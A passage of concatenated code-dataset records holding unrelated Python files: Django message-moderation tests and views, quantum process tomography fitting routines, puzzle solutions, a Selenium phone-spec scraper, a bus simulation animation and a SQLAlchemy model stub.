\n\n\n\n","sub_path":"Control/AthenaConfiguration/python/PropSetterProxy.py","file_name":"PropSetterProxy.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"128328770","text":"# coding=utf-8\nfrom global_test_case import GlobalTestCase as TestCase\nfrom subdomains.tests import SubdomainTestMixin\nfrom ..models import Message, WriteItInstance, \\\n Moderation, Confirmation, \\\n OutboundMessage\nfrom popit.models import Person\nfrom django.core import mail\nfrom django.contrib.sites.models import Site\nfrom subdomains.utils import reverse\nimport datetime\nfrom mock import patch\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext as _\n\nclass ModerationMessagesTestCase(TestCase, SubdomainTestMixin):\n def setUp(self):\n super(ModerationMessagesTestCase,self).setUp()\n self.writeitinstance1 = WriteItInstance.objects.all()[0]\n self.person1 = Person.objects.all()[0]\n self.private_message = Message.objects.create(content = 'Content 1', \n author_name='Felipe', \n author_email=\"falvarez@votainteligente.cl\", \n subject='Subject 1', \n public=False,\n writeitinstance= self.writeitinstance1, \n persons = [self.person1])\n self.confirmation = Confirmation.objects.create(message=self.private_message)\n self.host = self.get_host_for_subdomain(self.writeitinstance1.slug)\n\n def test_private_messages_confirmation_created_move_from_new_to_needs_moderation(self):\n moderation, created = Moderation.objects.get_or_create(message=self.private_message)\n self.private_message.recently_confirmated()\n \n outbound_message_to_pedro = OutboundMessage.objects.get(message=self.private_message)\n self.assertEquals(outbound_message_to_pedro.status, 'needmodera')\n\n\n def test_private_message_is_not_accesible(self):\n self.confirmation.confirmated_at = datetime.datetime.now()\n self.confirmation.save()\n self.private_message.confirmated = True\n self.private_message.save()\n host = self.get_host_for_subdomain(self.private_message.writeitinstance.slug)\n url = self.private_message.get_absolute_url()\n response = self.client.get(url,HTTP_HOST=host)\n\n self.assertEquals(response.status_code, 404)\n\n\n def test_outbound_messages_of_a_confirmed_message_are_waiting_for_moderation(self):\n #I need to do a get to the confirmation url\n moderation, created = Moderation.objects.get_or_create(message=self.private_message)\n url = reverse('confirm', kwargs={\n 'slug':self.confirmation.key\n })\n response = self.client.get(url)\n #this works proven somewhere else\n outbound_message_to_pedro = OutboundMessage.objects.get(message=self.private_message)\n self.assertEquals(outbound_message_to_pedro.status, 'needmodera')\n\n def test_message_send_moderation_message(self):\n moderation, created = Moderation.objects.get_or_create(message=self.private_message)\n self.private_message.send_moderation_mail()\n\n self.assertEquals(len(mail.outbox),2)\n moderation_mail = mail.outbox[1]\n self.assertModerationMailSent(self.private_message, moderation_mail)\n \n def test_create_a_moderation(self):\n #I make sure that uuid.uuid1 is called and I get a sort of random key\n with patch('uuid.uuid1') as string:\n string.return_value.hex = 'oliwi'\n message = Message.objects.create(content = 'Content 1', \n author_name='Felipe', \n author_email=\"falvarez@votainteligente.cl\", \n subject='Fiera es una perra feroz', \n public=False,\n writeitinstance= self.writeitinstance1, \n persons = [self.person1])\n\n self.assertFalse(message.moderation is None)\n self.assertEquals(message.moderation.key, 'oliwi')\n string.assert_called()\n #issue 114 found at https://github.com/ciudadanointeligente/write-it/issues/114\n def test_send_mails_only_once(self):\n with patch('nuntium.models.Message.send_moderation_mail') as send_moderation_mail:\n self.writeitinstance1.moderation_needed_in_all_messages = True\n self.writeitinstance1.save()\n\n send_moderation_mail.return_value = None\n message = Message.objects.create(content = 'Content 1', \n author_name='Felipe', \n author_email=\"falvarez@votainteligente.cl\", \n subject='Fiera es una perra feroz', \n public=False,\n writeitinstance= self.writeitinstance1, \n persons = [self.person1])\n\n message.recently_confirmated()\n\n\n number_of_moderations = Moderation.objects.filter(message=message).count()\n send_moderation_mail.assert_called_once_with()\n\n def test_message_has_a_method_for_moderate(self):\n self.confirmation.confirmated_at = datetime.datetime.now()\n self.confirmation.save()\n self.private_message.confirmated = True\n self.private_message.save()\n\n self.private_message.moderate()\n outbound_message_to_pedro = OutboundMessage.objects.get(message=self.private_message)\n\n self.assertTrue(self.private_message.moderated)\n self.assertEquals(outbound_message_to_pedro.status, 'ready')\n\n def test_message_that_has_not_been_confirmed_cannot_be_moderated(self):\n #this message has not been confirmed\n #and is private therefore requires moderation\n message = Message.objects.create(content = 'Content 1', \n author_name='Felipe', \n author_email=\"falvarez@votainteligente.cl\", \n subject='Fiera es una perra feroz', \n public=False,\n writeitinstance= self.writeitinstance1, \n persons = [self.person1])\n\n with self.assertRaises(ValidationError) as context:\n # this was taken from here\n # http://stackoverflow.com/questions/8215653/using-a-context-manager-with-python-assertraises#8215739\n try:\n message.moderate()\n except ValidationError as e:\n self.assertEqual(e.message,\n _('The message needs to be confirmated first',))\n raise \n\n self.assertFalse(message.moderated)\n outbound_message_to_pedro = OutboundMessage.objects.get(message=message)\n self.assertEquals(outbound_message_to_pedro.status, 'new')\n\n\n\n def test_there_is_a_moderation_url_that_sets_the_message_to_ready(self):\n self.confirmation.confirmated_at = datetime.datetime.now()\n self.confirmation.save()\n self.private_message.confirmated = True\n self.private_message.save()\n \n url = reverse('moderation_accept', kwargs={\n 'slug': self.private_message.moderation.key\n })\n response = self.client.get(url)\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'nuntium/moderation_accepted.html')\n\n #private_message = Message.objects.get(id=self.private_message.id)\n outbound_message_to_pedro = OutboundMessage.objects.get(message=self.private_message.id)\n self.assertEquals(outbound_message_to_pedro.status, 'ready')\n private_message = Message.objects.get(id=self.private_message.id)\n self.assertTrue(private_message.moderated)\n\n def test_moderation_get_success_url(self):\n expected_url = reverse('moderation_accept', kwargs={\n 'slug': self.private_message.moderation.key\n })\n self.assertEquals(self.private_message.moderation.get_success_url(), expected_url)\n\n def test_moderation_get_reject_url(self):\n expected_url = reverse('moderation_rejected', kwargs={\n 'slug': self.private_message.moderation.key\n })\n self.assertEquals(self.private_message.moderation.get_reject_url(), expected_url)\n\n def test_there_is_a_reject_moderation_url_that_deletes_the_message(self):\n '''\n This is the case when you proud owner of a writeitInstance \n think that the private message should not go anywhere\n and it should be deleted\n '''\n url = reverse('moderation_rejected', kwargs={\n 'slug': self.private_message.moderation.key\n })\n response = self.client.get(url)\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'nuntium/moderation_rejected.html')\n #If someone knows how to do the DoesNotExist or where to extend from \n #I could do a self.assertRaises but I'm not taking any more time in this\n self.assertEquals(Message.objects.filter(id=self.private_message.id).count(), 0)\n\n\n def test_when_moderation_needed_a_mail_for_its_owner_is_sent(self):\n self.private_message.recently_confirmated()\n #There should be two \n #One is created for confirmation\n #The other one is created for the moderation thing\n self.assertEquals(len(mail.outbox),2)\n moderation_mail = mail.outbox[1]\n #it is sent to the owner of the instance\n self.assertEquals(moderation_mail.to[0], self.private_message.writeitinstance.owner.email)\n self.assertTrue(self.private_message.content in moderation_mail.body)\n self.assertTrue(self.private_message.subject in moderation_mail.body)\n self.assertTrue(self.private_message.author_name in moderation_mail.body)\n self.assertTrue(self.private_message.author_email in moderation_mail.body)\n current_site = Site.objects.get_current()\n current_domain = 'http://'+current_site.domain\n url_rejected = reverse('moderation_rejected', kwargs={\n 'slug': self.private_message.moderation.key\n })\n\n url_accept = reverse('moderation_accept', kwargs={\n 'slug': self.private_message.moderation.key\n })\n\n\n self.assertFalse(current_domain+url_rejected in moderation_mail.body)\n self.assertTrue(url_rejected in moderation_mail.body)\n self.assertFalse(current_domain+url_accept in moderation_mail.body)\n self.assertTrue(url_accept in moderation_mail.body)\n\n\n\n def test_creates_automatically_a_moderation_when_a_private_message_is_created(self):\n message = Message.objects.create(content = 'Content 1', \n author_name='Felipe', \n author_email=\"falvarez@votainteligente.cl\", \n subject='Fiera es una perra feroz', \n public=False,\n writeitinstance= self.writeitinstance1, \n persons = [self.person1])\n\n self.assertFalse(message.moderation is None)\n\n\n def test_a_moderation_does_not_change_its_key_on_save(self):\n '''\n I found that everytime I did resave a moderation\n it key was regenerated\n '''\n previous_key = self.private_message.moderation.key\n self.private_message.moderation.save()\n moderation = Moderation.objects.get(message=self.private_message)\n post_key = moderation.key\n\n self.assertEquals(previous_key, post_key)\n\n def test_moderates_method(self):\n moderation = Moderation.objects.get(message=self.private_message)\n moderation.success()\n\n message = Message.objects.get(moderation=moderation)\n self.assertTrue(message.moderated)\n\n\n #this test is for the issue https://github.com/ciudadanointeligente/write-it/issues/186\n #\n def test_confirmated_but_not_moderated_message_in_a_moderable_instance_is_in_needs_moderation_status(self):\n mail_count = len(mail.outbox)\n self.writeitinstance1.moderation_needed_in_all_messages = True\n self.writeitinstance1.save()\n\n data = {\n 'author_email':u'falvarez@votainteligente.cl',\n 'author_name':u'feli',\n 'public':True,\n 'subject':u'Fiera no está',\n 'content':u'¿Dónde está Fiera Feroz? en la playa?',\n 'persons': [self.person1.id]\n }\n url = self.writeitinstance1.get_absolute_url()\n response = self.client.post(url, data, follow=True, HTTP_HOST=self.host)\n message = Message.objects.get(\n author_name=\"feli\", \n author_email=\"falvarez@votainteligente.cl\",\n subject=\"Fiera no está\", \n content='¿Dónde está Fiera Feroz? en la playa?')\n confirmation = Confirmation.objects.get(message=message)\n\n confirmation_response = self.client.get(confirmation.get_absolute_url())\n\n #one message to Pedro\n outbound_message = OutboundMessage.objects.get(message=message)\n #Here I have the bug!!!!!\n self.assertEquals(outbound_message.status, 'needmodera')\n #This one is the bug!!\\\n\n","sub_path":"nuntium/tests/moderation_messages_test.py","file_name":"moderation_messages_test.py","file_ext":"py","file_size_in_byte":12759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"401246824","text":"from django.contrib.auth import (login as auth_login, logout as auth_logout,\n authenticate)\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.shortcuts import render_to_response, get_object_or_404, redirect\nfrom django.template import RequestContext\nfrom template2pdf.dj import direct_to_pdf\nfrom main.models import Professor\nfrom main.tables import ProfessorTable\n\ndef login(request):\n if request.user.is_authenticated():\n return redirect('home')\n\n form = AuthenticationForm()\n if request.method == 'POST':\n form = AuthenticationForm(None, request.POST)\n if form.is_valid():\n auth_login(request, form.get_user())\n return redirect('home')\n\n return render_to_response('login.html', RequestContext(request, {\n 'form': form,\n }))\n\n@login_required\ndef logout(request):\n auth_logout(request)\n return redirect('login')\n\n@login_required\ndef home(request):\n return render_to_response('main/base.html', RequestContext(request))\n\n@login_required\ndef professors(request):\n queryset = Professor.objects.all()\n table = ProfessorTable(queryset)\n return render_to_response('main/professor.html', {\n 'table': table,\n }, RequestContext(request))\n\n@login_required\ndef students(request):\n raise NotImplementedError\n\n@login_required\ndef groups(request):\n raise NotImplementedError\n\n@login_required\ndef grades(request):\n raise NotImplementedError\n\n@login_required\ndef reports(request):\n return direct_to_pdf(request, 'main/reports/test.rml')\n","sub_path":"sei/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"97278415","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 14 15:22:48 2018\n\n@author: Jarnd\n\"\"\"\nimport qiskit.tools.qcvv.tomography as tomo\nimport Analysis.tomography_functions as tomoself\nimport numpy as np\n\n#%% Fitting of tomodata to chi\ndef fit_tomodata_multiple(meas_data_all, tomo_set, B_chi, B_choi, n,stddv=True):\n '''\n Fit the measurement tomography data from multiple datasets in meas_data_all specified by tomo_set to a chi and a corresponding choi matrix.\n There are 3 different methods:\n -'own' (standard): This method used the _fit_tomodata_own_ function, which is specified in that docstring.\n This method uses the _fit_tomodata_own() function. It provides a CP and TP chi and choi matrix.\n Furthermore, it calculates the standard deviation on chi (and choi) if stddv==True (standard)\n For details, see the docstring of that function.\n \n The other two methods use the interal qiskit function qiskit.tools.qcvv.tomography.fit_tomography_data()\n Both these methods use the wrapper function _fit_tomodata_qiskit_(). For details, see that docstring.\n -'wizard' : This method gives a CP choi and chi matrix but has problems with trace preservation.\n -'leastsq': This method is a straightforward least squares fit that does not promise CP, but has less problems with TP.\n \n The process matrices are returned as:\n ((chi,chi_stddv),(choi,choi_stddv))\n '''\n B_chi = tomoself.get_pauli_basis(n, normalise=False) # Get the basis in which chi is expressed\n B_prep = tomoself.get_pauli_basis(n, normalise=False) # Get the basis in which the experiments are prepared\n B_meas = tomoself.get_pauli_basis(n, normalise=False) # Get the basis in which the measurements are done\n \n lam, lampau, lamstddv = tomoself.get_lambda_from_meas_multiple(tomo_set, # Get the vectors lambda and lambda_stddv from the tomography data\n meas_data_all, n)\n A = tomoself.get_A_mat(B_prep, B_meas, B_chi) # Calculate the A matrix from the prep, meas and chi basis\n chivect = np.linalg.solve(A, lam) # Invert to calculate chi in vectorform\n Ainv = np.linalg.inv(A) # Calculate the inverse of A for error calculations (A is full rank)\n Ainvsq = np.abs(Ainv)*np.abs(Ainv); # Calculate the elementwise square of Ainv\n lamstddvsq = lamstddv*lamstddv; # Calculate the elementwise square of l_stddv\n chistddvvect = np.sqrt(Ainvsq @ lamstddvsq) # Calculate the standard deviation on chi using the method from the description\n chi = np.reshape(chivect, ((2*n)**2, (2*n)**2)) # Reshape into a square matrix\n print('Minimum eigenvalue before: ', np.min(np.linalg.eigvals(chi)))\n chi_stddv = np.reshape(chistddvvect, ((2*n)**2, (2*n)**2)) # Reshape into a square matrix\n print('largest eigenvalue before: ',np.max(np.linalg.eigvals(chi)))\n num = np.max(np.linalg.eigvals(chi)) + np.abs(np.min(np.linalg.eigvals(chi)))\n den = 1+16*np.abs(np.min(np.linalg.eigvals(chi)))\n print('test: ',num/den,'times 4:',4*num/den)\n #chi = make_CP(chi,n)\n print('Minimum eigenvalue after: ', np.min(np.linalg.eigvals(chi)))\n print('largest eigenvalue after: ',np.max(np.linalg.eigvals(chi)))\n choi = tomoself.chi_to_choi(chi,B_choi, n)\n choi_stddv = tomoself.chi_to_choi(chi_stddv, B_choi, n)\n return ((chi,chi_stddv),(choi,choi_stddv))\n\ndef fit_tomodata(tomo_data, tomo_set, B_chi, B_choi, n, method='own',stddv=True):\n '''\n Fit the tomography data from tomo_data specified by tomo_set to a chi and a corresponding choi matrix.\n There are 3 different methods:\n -'own' (standard): This method used the _fit_tomodata_own_ function, which is specified in that docstring.\n This method uses the _fit_tomodata_own() function. It provides a CP and TP chi and choi matrix.\n Furthermore, it calculates the standard deviation on chi (and choi) if stddv==True (standard)\n For details, see the docstring of that function.\n \n The other two methods use the interal qiskit function qiskit.tools.qcvv.tomography.fit_tomography_data()\n Both these methods use the wrapper function _fit_tomodata_qiskit_(). For details, see that docstring.\n -'wizard' : This method gives a CP choi and chi matrix but has problems with trace preservation.\n -'leastsq': This method is a straightforward least squares fit that does not promise CP, but has less problems with TP.\n \n The process matrices are returned as:\n ((chi,chi_stddv),(choi,choi_stddv))\n '''\n if method == 'own':\n chi, chi_stddv = _fit_tomodata_own_(tomo_data, tomo_set, n, stddv)\n chi = make_CP(chi,n)\n choi = tomoself.chi_to_choi(chi,B_choi, n)\n choi_stddv = tomoself.chi_to_choi(chi_stddv, B_choi, n)\n elif method == 'wizard':\n choi = _fit_tomodata_qiskit_(tomo_data, method='wizard')\n chi = tomoself.choi_to_chi(choi, B_choi, n)\n chi_stddv = np.zeros_like(chi)\n choi_stddv = np.zeros_like(chi)\n print('Warning: no standard deviation calculated!')\n elif method == 'leastsq':\n choi = _fit_tomodata_qiskit_(tomo_data, method='leastsq')\n choi = make_CP(choi,n)\n chi = tomoself.choi_to_chi(choi, B_choi, n)\n chi_stddv = np.zeros_like(chi)\n choi_stddv = np.zeros_like(chi)\n print('Warning: no standard deviation calculated!')\n else:\n print('Wrong method supplied: %s is not a valid option.' %(method))\n return None\n return ((chi,chi_stddv),(choi,choi_stddv))\n\ndef _fit_tomodata_qiskit_(tomo_data, method=None):\n '''\n Use the qiskit functions to fit the tomography data. There are two methods:\n 'magic' (standard): This fits the tomography data to a choi matrix that is completely positive and has trace 1.\n For more info of the fitting method, see the documentation of qiskit.tools.qcvv.tomography.fit_tomography_data\n There might be problems with the trace preservation-qualities of the matrix when using this method.\n \n 'leastsq' : This fits the data to a Choi matrix via simple linear inversion.\n There is no guarantee on CP (so in almost all cases the Choi matrix will not be CP)\n Therefore different methods have to be used to make the process CP\n Returned is a choi matrix corresponding to the data.\n '''\n if method == None:\n choi_fit = tomo.fit_tomography_data(tomo_data, options={'trace': 1})\n else:\n choi_fit = tomo.fit_tomography_data(\n tomo_data, method, options={'trace': 1})\n return choi_fit\n\n\ndef _fit_tomodata_own_(tomo_data, tomo_set, n, stddv = True):\n '''\n Use own functions to fit the tomography data to a chi matrix.\n For an input pauli P_i and an measurement basis P_j, the function first\n - First rewrites the results in tomo_data into a vector lambda.\n The vector lambda is of the form l(ij) = tr[P_jL(P_i)],\n where L(|p><|p|.\n As such, L(P_i)] is the (weighted) sum of the positive and negative eigenspace states of P_i:\n See get_lambda_from_meas() for more details\n - Then the matrix A is calculated:\n A(ij,mn) = tr(P_j P_m P_i P_n). See get_A_mat() for more details.\n A is full rank so invertible.\n - The matrix A links chi with lambda:\n l(ij) = sum(m,n) chi(m,n) tr(P_j P_m P_i P_n);\n a vetorized lambda and chi give: l = A*chi.\n Via linear inversion using the numpy.linalg.solve method chi is obtained.\n The indices of A are like:\n row ij = j + (i*j_total)\n column mn = n + (m*n_total)\n Furthermore, from the standard deviation as provided by get_lambda_from_meas(),\n the standard deviation on chi is calculated. For a single element of chi:\n stddv_chi(mn) = (sum(ij) ((Ainv)^2)(l_stddv)^2)^(1\\2)\n This is calculated by first taking the elementwise square of Ainv and l_stddv,\n and then taking the matrix product of Ainv^2 and l_sttdv^2\n The function then returns a tuple (chi, chi_stddv) both shaped into a square matrix\n '''\n B_chi = tomoself.get_pauli_basis(n) # Get the basis in which chi is expressed\n B_prep = tomoself.get_pauli_basis(n, normalise=False) # Get the basis in which the experiments are prepared\n B_meas = tomoself.get_pauli_basis(n, normalise=False) # Get the basis in which the measurements are done\n lam, lampau, lamstddv = tomoself.get_lambda_from_meas(tomo_set, # Get the vectors lambda and lambda_stddv from the tomography data\n tomo_data['data'], n)\n A = tomoself.get_A_mat(B_prep, B_meas, B_chi) # Calculate the A matrix from the prep, meas and chi basis\n chivect = np.linalg.solve(A, lam) # Invert to calculate chi in vectorform\n Ainv = np.linalg.inv(A) # Calculate the inverse of A for error calculations (A is full rank)\n Ainvsq = np.abs(Ainv)*np.abs(Ainv); # Calculate the elementwise square of Ainv\n lamstddvsq = lamstddv*lamstddv; # Calculate the elementwise square of l_stddv\n chistddvvect = np.sqrt(Ainvsq @ lamstddvsq) # Calculate the standard deviation on chi using the method from the description\n chi = np.reshape(chivect, ((2*n)**2, (2*n)**2)) # Reshape into a square matrix\n chistddv = np.reshape(chistddvvect, ((2*n)**2, (2*n)**2)) # Reshape into a square matrix\n return chi,chistddv \n\n\n\n#%% Trace preservation functions\ndef _get_total_prob_(tomo_data):\n '''\n Get the total counts of all individual measurements, and divide them by the total number of shots for every experiment.\n This should give a vector of only ones. If that is the case, then Trace Preservation is guaranteed after linear inversion.\n If this is not the case, then there are measurements unaccounted (e.g. a state was prepared but nothing was measured).\n Then, TP is not guaranteed.\n This function is mainly meant as a back-up test if the check_TP() function returns False.\n It works on the measurement data itself,\n but gives no assertion on the TP-qualities of a chi matrix computed from that data,\n if the method used to calculate the chi matrix is not specified.\n For the method fit_chi_own() the TP should be preserved. For fit_tomodata() this is not always te case, see docstring for further details.\n '''\n meas_data = tomo_data['data'] # Get the actual data\n assert type(meas_data) == list\n counts = []\n for meas in meas_data: # For all experiments (elements in meas_data)\n countsvalues = meas['counts'].values() # Get the counts from the dictionary\n counts.append(sum(list(countsvalues))/meas['shots']) # Sum all the counts and divide by #shots. //Should be 1\n return counts\n\ndef _get_TPsum_(chi, B_chi):\n '''\n Calculates sum(m,n) chi(m,n) B_n^(dagger)@B_m, which should be I for TP processes.\n '''\n d2 = np.shape(chi)[0] # d^2, the number of elements in the basis {B}\n iden = np.zeros_like(B_chi[0], dtype='complex') # A dxd empty matrix to put all elements of the sum in\n for m in range(d2):\n for n in range(d2):\n iden += chi[m, n]*np.mat(B_chi[n]).H@np.mat(B_chi[m]) # The np.mat class has a .H method that gives the hermitian\n return iden\n\n\ndef check_TP(chi, B_chi, n):\n '''\n Returns True when sum(m,n) chi(m.n) B_n^{dagger} B_m is close to the identity channel using the np.allclose() method, returns False if not.\n '''\n assert np.shape(chi) == ((2**n)**2, (2**n)**2)\n iden = np.eye(2**n, dtype='complex') # Identity matrix to which TPsum should be equal to\n TPsum = _get_TPsum_(chi, B_chi) # The sum of chi(m,n)*B_n^(dagger)*B_m for all n and m\n return np.allclose(TPsum,iden) # Return True iff close\n\n#%% Complete positivity functions\ndef make_CP(chi, n):\n '''\n This function makes a TP process matrix chi completely positive while preserving trace preservation.\n The function works as follows:\n - The eigenvalues of chi are calculated using the np.linalg.eigvals() method.\n - The dimension of the matrix space d(=2**n) is calculated as the trace of chi\n - If the eigenvalues are all nonnegative, then chi is already CP\n - If not, the function then, for the minimum eigenvalue l_m\n Calculates chi' = chi+abs(l_m)*I. Then chi' has no nonzero eigenvalues:\n chi = PDPinv with D the diagonal matrix of the eigenvalues, P (&Pinv) the transformation matrix to the eigenbasis of chi; PPinv = I\n Then: chi' = PDPinv + abs(l_m)*I = PDPinv + abs(l_m)*IPPinv = PDPinv + P*(abs(l_m)*I)*Pinv = P*(D+abs(l_m)I)*Pinv.\n Thus, chi' now has only nonnegative eigenvalues.\n However, the TP condition for chi reads: sum(m,n) chi(m,n) B_n@B_m = I\n We now have: sum(m,n) chi'(m,n) B_n@B_m = sum(m,n) chi(m,n) B_n@B_m + sum(n) abs(l_m) B_n@B_n= I + d^2*l_m*I = (1+d^2*abs(l_m))*I\n With d^2 the number of elements in the basis {B_n}\n The trace of chi' is d*(1+d^2*abs(l_m)), so to obtain a TP version of chi' the function divides chi' by tr(chi')/d\n The function now returns the CP and TP matrix chi'\n '''\n assert np.shape(chi) == ((2**n)**2, (2**n)**2) # Check the dimensions\n mineig = np.min(np.linalg.eigvals(chi)) # Calculate the minimum eigenvalue of chi\n trace_chi = np.trace(chi) # Calculate d\n if mineig < 0:\n chiCP = np.add(chi, (-1)*mineig*np.eye((2*n)**2)) # Calculate chi'\n return trace_chi*chiCP/np.trace(chiCP) # Multiply by d/tr(chi'), which is division by tr(chi')/d\n\ndef check_CP(chi):\n '''\n This function checks whether the matrix chi is a CP-process by checking the eigenvalues for negative numbers.\n This works also for Choi matrices.\n '''\n eig = np.linalg.eigvals(chi)\n if np.around(min(eig),10) >= 0:\n return True\n else: return False\n#%% Errors and fidelities\ndef get_chi_error(chi, chi_bas, U, mode='p'):\n '''\n Calculate the error matrix chi_error associated with the process matrix chi. chi_error is the chi matrix in a different basis {B_m@U}:\n rho_out = sum(m,n) chi_error(m,n) (B_m@U) @ rho_in @ (U^dagger@B_n^dagger)\n Using this relation, chi_error can be calculated from chi straight away:\n chi_error = V@chi@V^(dagger), with V(m,n) = tr(B_m^(dagger)@B_(n)@U^(dagger))/d\n \n The error process can also me modeled to take place before the unitary operation:\n rho_out = sum(m,n) chi_error(m,n) (U@B_m) @ rho_in @ (B_n^dagger@ U^dagger)\n Then:\n chi_error = V@chi@V^(dagger), withV(m,n) is specified by tr(B_m^(dagger)@U^(dagger)@B_(n))\n \n Which order is used is specified by 'mode': \n 'p' (standard) : first the unitary opertaion, then the error channel\n 'm' : first the error channel, then the unitary operation\n \n For more information on chi_error, see 'Error matrices in quantum process tomography' by A. Korotkov.\n '''\n chi = np.mat(chi)\n U = np.mat(U)\n d = np.trace(chi_bas[0].conj().T*chi_bas[0])\n V = np.mat(np.zeros((len(chi_bas), len(chi_bas))), dtype='complex')\n mc = 0\n for i in range(len(chi_bas)):\n chi_bas[i] = np.mat(chi_bas[i])\n for m in chi_bas:\n nc = 0\n for n in chi_bas:\n if mode == 'p':\n V[mc, nc] = np.trace(m.H @ n @ U.H)/d\n if mode == 'n':\n V[mc, nc] = np.trace(m.H @ U.H @ n)/d\n nc += 1\n mc += 1\n return V @ chi @ V.H\n\ndef process_fidelity(chi_error, n):\n '''\n Returns the process fidelity tr(chi@chi_des) for a observed chi and a desired chi_des.\n Since this is equal to tr(chi_I@chi_error) with chi_I the perfect chi for the identity channel,\n the process fidelity is calculated as the topleft element of the error matrix chi_error.\n '''\n return chi_error[0,0]/np.trace(chi_error) # Divide by the total trace of chi to get a number between 0 and 1\n\ndef channel_fidelity(chi_error,B_choi, n):\n '''\n Returns the channel fidelity as >< n:\n print(i-1)\n exit()\n\n#4\nh, w, a, b = map(int, input().split())\nans = 0\n\ndef dfs(i, bit, a, b):\n if i == h*w:\n global ans\n ans += 1\n return\n if bit >> i & 1:\n dfs(i+1, bit, a, b)\n return\n if b:\n dfs(i+1, bit | 1 << i, a, b-1)\n if a:\n if i % w != w-1 and not bit & 1 << (i+1):\n dfs(i+1, bit | 1 << i | 1 << (i+1), a-1, b)\n if i + w < h*w:\n dfs(i+1, bit | 1 << i | 1 << (i+w), a-1, b)\ndfs(0, 0, a, b)\nprint(ans)\n","sub_path":"Day12.py","file_name":"Day12.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"35769609","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport json\nimport time\n\n\noptions = Options()\n# options.binary_location = \"C:\\\\path\\\\to\\\\chrome.exe\" #chrome binary location specified here\noptions.add_argument(\"--start-maximized\") #open Browser in maximized mode\noptions.add_argument(\"--no-sandbox\") #bypass OS security model\noptions.add_argument(\"--disable-dev-shm-usage\") #overcome limited resource problems\noptions.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\noptions.add_experimental_option('useAutomationExtension', False)\ndriver = webdriver.Chrome(options=options, executable_path=r'./chromedriver')\n\ndriver.get('https://www.gsmarena.com/makers.php3')\n\n\ncategory = []\nphones = []\nfilename = 'data.json'\n\n\ndef get_phones():\n phones_url = \"return (function(){let cate = [] ; document.querySelectorAll('.makers a').forEach(function(i,e){cate.push('https://www.gsmarena.com/'+i.getAttribute('href'));}); return cate;})();\"\n phones_url = driver.execute_script(phones_url)\n\n for phone in phones_url:\n phones.append(phone)\n\n print(phones,len(phones))\n while True:\n if driver.execute_script(\"return document.querySelector('.nav-pages strong').nextElementSibling\"):\n driver.execute_script(\"return document.querySelector('.nav-pages strong').nextElementSibling.click()\")\n get_phones()\n else:\n print('all phone end')\n break\n\n\ndef open_single_phone_page():\n\n while True:\n if len(phones) > 0:\n print(len(phones),'Opening')\n driver.get(phones.pop(0))\n get_info_pic_and_save_in_file()\n pass\n else:\n break\n\ndef get_info_pic_and_save_in_file():\n time.sleep(2)\n print('installing jquery')\n with open('jquery.js', errors='ignore') as f:\n driver.execute_script(f.read())\n print('installed jquery')\n print('getting information')\n with open('get_information.js', errors='ignore') as f:\n driver.execute_script(f.read())\n print('getted information')\n time.sleep(3)\n print('getting pictures')\n if driver.execute_script(\" return document.querySelector('.article-info-meta-link a i.icon-pictures')\"):\n driver.get('https://www.gsmarena.com/'+driver.execute_script(\" return document.querySelector('.article-info-meta-link a i.icon-pictures').parentElement.getAttribute('href');\"))\n with open('pictures.js', errors='ignore') as f:\n driver.execute_script(f.read())\n print('getted pictures')\n time.sleep(1)\n\n data = (driver.execute_script(\"return JSON.parse(localStorage.getItem('c'))\"))\n \n \n with open(filename, 'a') as outfile:\n json.dump(data, outfile)\n with open(filename, 'a') as outfile:\n outfile.write(',')\ndef main():\n with open(filename, 'w') as outfile:\n outfile.write('[')\n # Get Main Brands From the First Page\n category = \"return (function(){let cate = [] ; document.querySelectorAll('.st-text a').forEach(function(i,e){cate.push('https://www.gsmarena.com/'+i.getAttribute('href'));}); return cate;})();\"\n category = driver.execute_script(category)\n\n print(len(category))\n\n i = 116\n\n while i > 1:\n category.pop()\n i = i -1\n\n print(len(category),category)\n\n # If Brands array is not 0 pop the url and \n # 1. Get the pages until pagination is not emptyed\n # 2. Open the Single Page Mobile\n # 3. Get the information from the single page\n while True:\n \n if len(category) <= 0:\n print('end')\n break\n else:\n driver.get(category.pop(0))\n get_phones()\n open_single_phone_page()\n print('pop')\n\n\nmain()","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"318054855","text":"import matplotlib\nmatplotlib.use('TKAgg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\nfrom busstop.objects import Bus, BusStop, BusPassenger\nfrom busstop.linear import LinearBusRouteModel\n\ndef animate_model(model):\n fig = plt.figure()\n ax = fig.add_axes([0, 0, 1, 1])\n\n time = -1 # time\n events = model.init()\n for event in events:\n print((time,) + event)\n\n def init():\n # Initialise the graphics\n return model.init_animation(ax)\n\n def update(frame_number):\n # Update the simulation\n time = frame_number\n events = model.update()\n for event in events:\n print((time,) + event)\n # Update the graphics\n return model.update_animation()\n\n animation = FuncAnimation(fig, update, init_func=init, blit=True)\n plt.show()\n","sub_path":"busstop/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"234818683","text":"from sqlalchemy import create_engine, Column, Integer, String, Sequence, ForeignKey, Table, Text\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom sqlalchemy.sql import exists\n\n#create Engine object\nengine = create_engine('sqlite:///:memory:')\n#create home class\nBase = declarative_base()\n\n#object association table\ninstructor_course = 